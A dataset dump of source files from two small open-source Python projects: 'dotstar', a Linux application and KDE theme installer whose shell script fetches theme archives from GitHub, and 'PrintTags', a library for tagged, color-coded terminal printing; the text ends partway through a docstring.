ui.print_information(\"Installation of %s (the global theme)...\" % theme_name)\n installation_command = \"kpackagetool5 -i \" + theme_folder_path\n installation_failed = bool(ui.exec_system(installation_command))\n\n if installation_failed:\n ui.print_error(\"Error: impossible to install the global theme.\")\n return\n\n ui.print_information(\"Global theme successfully installed.\")\n ui.print_information(\"Setting the theme... (some QDBusConnection errors can span but they aren't serious)\")\n\n setting_the_theme_command = \"lookandfeeltool --apply \" + theme_name\n setting_failed = bool(ui.exec_system(setting_the_theme_command))\n\n if setting_failed:\n ui.print_error(\"Error: impossible to set the global theme.\")\n else:\n ui.print_information(\"Global theme successfully set.\")\n ui.print_information(\n \"Note that with KDE a bug can occur when changing window style:\"\n + \"if you have a white strip on some window (like the setting app),\"\n + \"change the color decoration to a light-one that then re-change it to Sweet-Dark.\"\n )\n" }, { "alpha_fraction": 0.7441490292549133, "alphanum_fraction": 0.7473301291465759, "avg_line_length": 44.37113571166992, "blob_id": "3b4d49aac796029a862a36a6b8f6898cfc0be3d3", "content_id": "8929424ecce0d6639eb050f5f4c28d999e63f602", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4401, "license_type": "permissive", "max_line_length": 249, "num_lines": 97, "path": "/src/theme/install_theme_components.sh", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# Script to install the theme components.\n\n# GLOBAL VARIABLES\nUSER_SHARE_PATH=\"$HOME/.local/share/\"\nreadonly USER_SHARE_PATH\n\n# CREATING /tmp/dotstar-theme-components/\ncd \"/tmp/\" || echo \"Error: impossible to access to /tmp/ (wtf). Exiting.\" || exit 1\nMAIN_FOLDER_NAME=\"dotstar-theme-components\"\nreadonly MAIN_FOLDER_NAME\n# if dotstar-theme-components already exists, we delete it\nif [ -d \"$MAIN_FOLDER_NAME\" ]; then\n rm -rf \"$MAIN_FOLDER_NAME\"\nfi\nmkdir \"$MAIN_FOLDER_NAME\"\ncd \"$MAIN_FOLDER_NAME\" || echo \"Error: impossible to access to /tmp/$MAIN_FOLDER_NAME after creating it (wtf). 
Exiting.\" || exit 1\n\n\n# SWEET COMPONENTS\necho \"Beginning the Sweet part...\"\n# getting Sweet from GitHub\necho \"Downloading the Sweet theme from GitHub...\"\nSWEET_ARCHIVE_NAME=\"Sweet-nova.tar.gz\"\nSWEET_FOLDER_NAME=\"Sweet-nova\"\nreadonly SWEET_ARCHIVE_NAME\nreadonly SWEET_FOLDER_NAME\nwget https://github.com/EliverLara/Sweet/archive/nova.tar.gz --output-document=\"$SWEET_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Sweet theme archive from GitHub. Exiting.\" || exit 1\necho \"Downloading the Sweet theme from GitHub: done.\"\necho \"Installing the Sweet components...\"\n# decompressing Sweet\ntar -xf \"$SWEET_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Sweet theme archive. Exiting.\" || exit 1\n# removing the archive\nrm $SWEET_ARCHIVE_NAME\ncd \"$SWEET_FOLDER_NAME/kde\" || echo \"Error: impossible to enter on $SWEET_FOLDER_NAME/kde/. Exiting.\" || exit 1\n# installing aurorae\ncp -r \"aurorae/Sweet-Dark/\" \"$USER_SHARE_PATH/aurorae/themes/\"\n# installing colorsheme\ncp \"colorschemes/Sweet.colors\" \"$USER_SHARE_PATH/color-schemes/\"\n# installing cursors\ncp -r \"cursors/Sweet-cursors\" \"$USER_SHARE_PATH/icons/\"\n# installing sddm\n# TODO find where put it\n# Sweet components installed\necho \"Installing the Sweet components: done.\"\necho \"Sweet part finished.\"\n\n\n# Layan components\necho \"Beginning the Layan part...\"\necho \"Downloading the Layan theme from GitHub...\"\ncd \"/tmp/$MAIN_FOLDER_NAME/\" || echo \"Error: impossible to return to /tmp/$MAIN_FOLDER_NAME/. Exiting.\" || exit 1\n# getting Layan from GitHub\nLAYAN_ARCHIVE_NAME=\"Layan-master.tar.gz\"\nLAYAN_FOLDER_NAME=\"Layan-kde-master\"\nreadonly LAYAN_ARCHIVE_NAME\nreadonly LAYAN_FOLDER_NAME\nwget https://github.com/vinceliuice/Layan-kde/archive/master.tar.gz --output-document=\"$LAYAN_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Layan theme archive from GitHub. Exiting.\" || exit 1\necho \"Downloading the Layan theme from GitHub: done.\"\necho \"Installing the Layan components...\"\n# decompressing Layan\ntar -xf \"$LAYAN_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Layan theme archive. Exiting.\" || exit 1\n# removing the archive\nrm $LAYAN_ARCHIVE_NAME\ncd \"$LAYAN_FOLDER_NAME\" || echo \"Error: impossible to enter on $LAYAN_FOLDER_NAME/. Exiting.\" || exit 1\n# plasma\ncp -r \"plasma/desktoptheme/Layan/\" \"$USER_SHARE_PATH/plasma/desktoptheme/\"\ncp -r \"plasma/desktoptheme/icons/\" \"$USER_SHARE_PATH/plasma/desktoptheme/Layan/\"\n# wallpaper\ncp -r \"wallpaper/Layan/\" \"$USER_SHARE_PATH/wallpapers/\"\n# Layan components installed\necho \"Installing the Layan components: done.\"\necho \"Layan part finished.\"\n\n# Papirus (icons)\necho \"Beginning the Papirus part...\"\necho \"Downloading the Papirus icon theme from GitHub...\"\ncd \"/tmp/$MAIN_FOLDER_NAME/\" || echo \"Error: impossible to return to /tmp/$MAIN_FOLDER_NAME/. Exiting.\" || exit 1\n# getting Papirus from GitHub\nPAPIRUS_ARCHIVE_NAME=\"Papirus-master.tar.gz\"\nPAPIRUS_FOLDER_NAME=\"papirus-icon-theme-master\"\nreadonly PAPIRUS_ARCHIVE_NAME\nreadonly PAPIRUS_FOLDER_NAME\nwget https://github.com/PapirusDevelopmentTeam/papirus-icon-theme/archive/master.tar.gz --output-document=\"$PAPIRUS_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Layan theme archive from GitHub. 
Exiting.\" || exit 1\necho \"Downloading the Papirus icon theme: done\"\necho \"Installing the Papirus icon theme...\"\n# decompressing Papirus\ntar -xf \"$PAPIRUS_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Layan theme archive. Exiting.\" || exit 1\n# removing the archive\nrm \"$PAPIRUS_ARCHIVE_NAME\"\ncd \"$PAPIRUS_FOLDER_NAME\" || echo \"Error: impossible to enter on $LAYAN_FOLDER_NAME/. Exiting.\" || exit 1\n# installing icons\ncp -r \"Papirus/\" \"$USER_SHARE_PATH/icons/\"\necho \"Installing the Papirus icon theme: done.\"\necho \"Papirus part finished.\"\n\nexit 0\n" }, { "alpha_fraction": 0.6734219789505005, "alphanum_fraction": 0.6753219366073608, "avg_line_length": 33.83088302612305, "blob_id": "e8e12ae814328dccdbbf98ca79717b7bc5cc792f", "content_id": "6252cf0048f306226bf226926073b895cf634a4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4737, "license_type": "permissive", "max_line_length": 202, "num_lines": 136, "path": "/README.md", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "# dotstar\ndotstar is a Python 3 program to automate the installation and configuration of everything I think useful and cool on a Linux distro.\n\n\n\n## DISCLAIMER:\ndotstar is currently under development, so **it is UNUSABLE**. Come back later! If you really appreciate my initiative, you can star it to find it easily later.\n\n\n\n## Table of contents\n- [Main features](#main-features)\n- [Controls](#controls)\n- [Applications](#applications)\n - [Proposed applications](#proposed-applications)\n - [Supported package managers](#supported-package-managers)\n- [Apparence](#apparence)\n - [Supported DEs](#supported-DEs)\n- [Help](#help)\n - [F.A.Q](#F.A.Q.)\n - [Support](#support)\n \n\n\n## Main features\n- Get a full setup Linux from a fresh installation in minutes!* From applications install, configuration & plugin setup to the look of your DE (Desktop Environment), your Linux will be freaking awesome.\n\n- **You** have the power: dotstar will always ask for your permission on each of its actions (from installing an app to changing a color scheme).\n\n- Useful no matter your experience:\n\n - You're a complete noob with Linux? dotstar will help you to get everything you will need for your first steps in this awesome world.\n\n - You're an advanced user, but you're annoyed to reinstall everything manually each time you change your distro? Fork dotstar to get a base for your own fast installation and configuration app!\n\n - You're just a classic user looking for awesome apps and a fast rocking of the look of your DE? You're in the right place too.\n\n- dotstar uses categories, so for exemple it will ask you if you want some text editors, then for each text editor if you want to install it. \n\n*The speed will of course will depend on your connection speed if you choose to install heavy apps.\n\n\n\n## Controls\nAfter starting the app, dotstar will successively ask you if you want it to effectuate the proposed action.\n\n- Accept an action with `y` (for *yes*), decline with `n` (for *no*).\n \n- You don't understand what the tool is asking? Answer `-h` (for *help*) to get some help (unavailable for now).\n\n- You miss clic your last answer? 
Don't panic: answer `-p` (for *previous*) to reverse the last action and then return to it (unavailable for now).\n\n\n\n## Applications\n### Proposed applications \n\n- **Development**\n - **Text editors**\n - [Atom](https://atom.io)\n - [Gedit](https://wiki.gnome.org/Apps/Gedit)\n - [Visual Studio Code](https://code.visualstudio.com/)\n - **JetBrains IDEs**\n - [Android Studio](https://developer.android.com/studio)\n - [CLion](https://www.jetbrains.com/clion/)\n - [DataGrip](https://www.jetbrains.com/datagrip/)\n - [GoLand](https://www.jetbrains.com/go/)\n - [IntelliJ IDEA](https://www.jetbrains.com/idea/) (Community & Ultimate)\n - [PhpStorm](https://www.jetbrains.com/phpstorm/)\n - [Pycharm](https://www.jetbrains.com/pycharm/) (Community & Pro)\n - [Rider](https://www.jetbrains.com/rider/)\n - [RubyMine](https://www.jetbrains.com/ruby/)\n - [WebStorm](https://www.jetbrains.com/webstorm/)\n \n- **File managers**\n - [Dolphin](https://apps.kde.org/dolphin/)\n - [Nautilus](https://wiki.gnome.org/Apps/Files)\n\n - **Graphisme tools**\n - [Gcolor3](https://www.hjdskes.nl/projects/gcolor3/)\n - [GIMP](https://www.gimp.org)\n - [Inkscape](https://inkscape.org/)\n\n- **Multimedia**\n - [Shotwell](https://wiki.gnome.org/Apps/Shotwell)\n - [VLC](https://www.videolan.org/vlc/)\n\n- **Productivity & office tools**\n - [FreeOffice](https://www.freeoffice.com/en/)\n - [LibreOffice](https://www.libreoffice.org/)\n - [Toggl Track](https://www.toggl.com/track/)\n - [SimpleNote](https://simplenote.com)\n\n- **Social**\n - [Discord](https://discord.com/)\n - [Thunderbird](https://www.thunderbird.net/)\n\n- **System tools**\n - [Filelight](https://apps.kde.org/filelight/)\n - [Gnome System Monitor](https://wiki.gnome.org/Apps/SystemMonitor/)\n - [Timeshift](https://github.com/teejee2008/timeshift)\n\n- **Terminal emulators**\n - [Gnome Terminal](https://wiki.gnome.org/Apps/Terminal)\n - [Konsole](https://konsole.kde.org/)\n\n- **Web browsers**\n - [Chromium](https://www.chromium.org/Home)\n - [Firefox](https://www.mozilla.org/en-US/firefox/new/)\n - [Tor Browser](https://www.torproject.org/)\n\n- **Other apps**\n - [KCalc](https://apps.kde.org/kcalc/)\n - [Simple Screen Recorder](https://www.maartenbaert.be/simplescreenrecorder/)\n - [zsh](https://www.zsh.org)\n\n\n### Supported package managers\n- [X] Pacman\n- [X] Snap\n- [ ] Flatpak\n- [ ] APT\n- [ ] YUM\n\n\n\n## Apparence\n### Supported DEs\n- [X] KDE Plasma 5\n- [ ] Gnome 3\n\n\n\n## Help\n### F.A.Q.\n### Support\n" }, { "alpha_fraction": 0.6647371053695679, "alphanum_fraction": 0.6647371053695679, "avg_line_length": 24.912500381469727, "blob_id": "0f1a4a01fb6ea57aef99473435367a27a7405dbd", "content_id": "15bc10eed65fe85b875e63ef1895808833a65a2d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2073, "license_type": "permissive", "max_line_length": 117, "num_lines": 80, "path": "/src/ui.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from colorama import Fore\nfrom typing import Any, Callable\n\nimport os # for exec_system\n\n# colors\nQUESTION_COLOR = Fore.GREEN\nDELIMITER_COLOR = Fore.BLUE\nDESCRIPTION_COLOR = Fore.MAGENTA\nERROR_COLOR = Fore.RED\nINFORMATION_COLOR = Fore.YELLOW\nSYSTEM_COLOR = Fore.CYAN\nRESET_COLOR = Fore.RESET\n\nDELIMITER = \"##################################################\"\n\n\ndef exec_colored(fore: int, func: Callable[[Any], Any], param: Any) -> Any:\n \"\"\"\n Executes the function with an colored output\n\n :param fore: color 
of the output\n :param func: function to execute\n :param param: parameter to give to func\n :return: the result of func\n \"\"\"\n print(fore, end=\"\")\n result = func(param)\n print(RESET_COLOR, end=\"\")\n return result\n\n\ndef ask(question: str) -> str:\n \"\"\"\n Asks the question to the user with a colored font\n\n :param question: text to show before the input\n :return: what the user enters\n \"\"\"\n return exec_colored(QUESTION_COLOR, input, question + RESET_COLOR)\n\n\ndef print_delimiter() -> None:\n \"\"\"\n Prints the delimiter with a colored font\n \"\"\"\n exec_colored(DELIMITER_COLOR, print, DELIMITER)\n\n\ndef print_description(description: str) -> None:\n \"\"\"\n Prints the description with a colored font\n \"\"\"\n exec_colored(DESCRIPTION_COLOR, print, description)\n\n\ndef print_error(error_message: str) -> None:\n \"\"\"\n Prints the error with a colored font\n \"\"\"\n exec_colored(ERROR_COLOR, print, error_message)\n\n\ndef print_information(information: str) -> None:\n \"\"\"\n Prints the information with a colored font\n \"\"\"\n exec_colored(INFORMATION_COLOR, print, information)\n\n\ndef exec_system(command: str) -> int:\n \"\"\"\n Executes the given system command\n\n :return: the return code\n \"\"\"\n # we have to print SYSTEM_COLOR because since in exec_colored the color is put at the beginning of the first line\n # but the all the actual line is deleted with os.system, SYSTEM_COLOR will be ignored else.\n print(SYSTEM_COLOR)\n return exec_colored(SYSTEM_COLOR, os.system, command)\n" } ]
11
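dotstar's PackageManager.command_shape is a plain %s template: install_apps() in utilities.py joins every package name into one command when multiple_apps_query_support is true, and issues one command per package otherwise. A minimal sketch of that expansion, assuming it is run from the repo's src/ directory; the package names here are arbitrary examples, not part of the repo:

from applications.package_manager import PackageManager

pacman = PackageManager("pacman", "pacman", "sudo pacman -Sy %s", True)
snap_classic = PackageManager("snap classic", "snap", "sudo snap install %s --classic", False)

apps = ["gimp", "vlc"]
# Batch-capable PM: one joined command, as in install_apps().
print(pacman.command_shape % " ".join(apps))   # sudo pacman -Sy gimp vlc
# No multi-app support: one command per package.
for app in apps:
    print(snap_classic.command_shape % app)    # sudo snap install gimp --classic, then vlc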
Frangmuler/PrintTags
https://github.com/Frangmuler/PrintTags
b852fe1b88d9517c553f10f739810dd522200e4e
b16ca9b52e235767f688e887d73bbcc592110d8b
36d1b4bd33a9e4e9746625812aab959d677912f1
refs/heads/master
2020-07-30T23:28:22.876697
2019-09-19T00:26:32
2019-09-19T00:26:32
210,397,930
1
0
MIT
2019-09-23T16:06:04
2019-09-19T00:26:40
2019-09-19T00:26:39
null
[ { "alpha_fraction": 0.7166504263877869, "alphanum_fraction": 0.7224926948547363, "avg_line_length": 35.67856979370117, "blob_id": "881b7308c345d196244f88fc83f1ccb314a485a2", "content_id": "ec5f6b32ded2741008c24c0aad02b0c5240539e0", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1027, "license_type": "permissive", "max_line_length": 81, "num_lines": 28, "path": "/setup.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport PrintTags\n\nname = 'PrintTags'\ndescription = 'A lightweight, tagged, and color-coded Python 3 print alternative'\nlong_description = (\n 'PrintTags is a lightweight package designed to act as an '\n 'alternative to the built-in Python 3 print function. It prints '\n 'color coded, tagged messages that can be useful in debugging, '\n 'or if you just prefer a cleaner appearance in your terminal.'\n)\nurl = 'https://github.com/MichaelDylan77/PrintTags'\nauthor = 'Michael Lockyer'\nauthor_email = '[email protected]'\nversion = PrintTags.__version__\nlicense = 'MIT License'\nclassifiers = (\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n)\npackages = find_packages()\n\nsetup(name=name, description=description, long_description=long_description,\n version=version, url=url, author=author, author_email=author_email,\n license=license, classifiers=classifiers, packages=packages)\n" }, { "alpha_fraction": 0.5517815351486206, "alphanum_fraction": 0.5601065754890442, "avg_line_length": 21.75, "blob_id": "e7254c3440450445190f387b21650a828a49e4da", "content_id": "8cc5a7786638081431d52ef18eeb37aa1f6e0549", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "permissive", "max_line_length": 61, "num_lines": 132, "path": "/PrintTags/colors.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Verify that using ANSI color is supported\nfrom os import getenv\n_color_supported = getenv('ANSI_COLORS_DISABLED') is None\n\n# ANSI color codes\n_black_color = 30\n_red_color = 31\n_green_color = 32\n_yellow_color = 33\n_blue_color = 34\n_magenta_color = 35\n_cyan_color = 36\n_white_color = 37\n\n# ANSI string format\n_base_string = '\\033[0;{}m{}\\033[0m'\n\n\ndef _colorize_string(string, color=_black_color) -> str:\n if _color_supported:\n string = _base_string.format(color, string)\n return string\n\n\nclass Colors(object):\n\n \"\"\"\n Contains all the base methods responsible for wrapping\n input strings in ANSI escape codes\n \"\"\"\n\n @staticmethod\n def black(string) -> str:\n \"\"\"\n Colorizes a string to black\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_black_color)\n\n @staticmethod\n def red(string) -> str:\n \"\"\"\n Colorizes a string to red\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_red_color)\n\n @staticmethod\n def green(string) -> str:\n \"\"\"\n Colorizes a string to green\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, 
color=_green_color)\n\n @staticmethod\n def yellow(string) -> str:\n \"\"\"\n Colorizes a string to yellow\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_yellow_color)\n\n @staticmethod\n def blue(string) -> str:\n \"\"\"\n Colorizes a string to blue\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_blue_color)\n\n @staticmethod\n def magenta(string) -> str:\n \"\"\"\n Colorizes a string to magenta\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_magenta_color)\n\n @staticmethod\n def cyan(string) -> str:\n \"\"\"\n Colorizes a string to cyan\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_cyan_color)\n\n @staticmethod\n def white(string) -> str:\n \"\"\"\n Colorizes a string to white\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_white_color)\n\n\nif __name__ == \"__main__\":\n pass\n" }, { "alpha_fraction": 0.649632453918457, "alphanum_fraction": 0.6498075127601624, "avg_line_length": 43.066837310791016, "blob_id": "e5cbfcdc63afc9a1f0c5f4d6ac71255ae367d061", "content_id": "cabb7a5ff94a92e1f17cdf22f0e9a4bc3854080a", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17142, "license_type": "permissive", "max_line_length": 126, "num_lines": 389, "path": "/PrintTags/print_tags.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\n\nfrom .colors import Colors\n\n# Tags\ninfo_tag = '[info] '\nsuccess_tag = '[success] '\nnotice_tag = '[notice] '\ntimeout_tag = '[timeout] '\nwarn_tag = '[warn] '\nexit_tag = '[exit] '\nerror_tag = '[error] '\n\n\ndef _insert_prefix(prefix, *args) -> list:\n prefix = str(prefix)\n # Make args mutable as a list\n args = list(args)\n if not prefix.endswith(' '):\n prefix += ' '\n # Attach tag to first arg so separator doesn't catch it\n args[0] = prefix + str(args[0])\n return args\n\n\ndef _get_timestamp() -> str:\n return datetime.now().strftime('%d-%b-%Y %I:%M:%S%p ')\n\n\ndef black(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in black\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.black(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.black(sep),\n end=Colors.black(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n 
raise\n\n\ndef red(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in red\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.red(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.red(sep),\n end=Colors.red(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef green(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in green\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.green(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.green(sep),\n end=Colors.green(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef yellow(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in yellow\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.yellow(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.yellow(sep),\n end=Colors.yellow(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef blue(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in blue\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string 
interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.blue(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.blue(sep),\n end=Colors.blue(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef magenta(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in magenta\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.magenta(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.magenta(sep),\n end=Colors.magenta(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef cyan(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in cyan\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.cyan(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.cyan(sep),\n end=Colors.cyan(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\ndef white(*args, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Prints values in white\n\n Args:\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a 
closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(prefix, *args) if prefix else args\n args = _insert_prefix(_get_timestamp(), *args) if add_datetime else args\n args = [Colors.white(arg) for arg in args]\n try:\n print(*args,\n sep=Colors.white(sep),\n end=Colors.white(end),\n file=file,\n **kwargs)\n except ValueError:\n if closed_ok:\n pass\n else:\n raise\n\n\n# Tagged color printouts\n\ndef info(*args, tag=info_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used for printing basic information.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that will be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n cyan(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef success(*args, tag=success_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to indicate the successful execution of a process.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. None or False for no tag\n add_datetime (bool, optional): Whether or not a datetime timestamp should be printed\n prefix (any, optional): A string interpolatable value that should be prepended to the print\n sep (str, optional): string inserted between values, default is a space.\n end (str, optional): string appended after the last value, default is a newline.\n closed_ok (bool, optional): Whether or not the ValueError raised by a closed stdout should be suppressed\n file: A file-like object (stream); defaults to the current sys.stdout.\n flush (bool, optional): whether to forcibly flush the stream.\n \"\"\"\n\n args = _insert_prefix(tag, *args) if tag else args\n green(*args, add_datetime=add_datetime, prefix=prefix, sep=sep, end=end, file=file, closed_ok=closed_ok, **kwargs)\n\n\ndef notice(*args, tag=notice_tag, add_datetime=False, prefix=None, sep=' ', end='\\n', closed_ok=False, file=None, **kwargs):\n \"\"\"\n Used to print important information.\n\n Args:\n tag (any, optional): The tag that will be prepended to the print. 
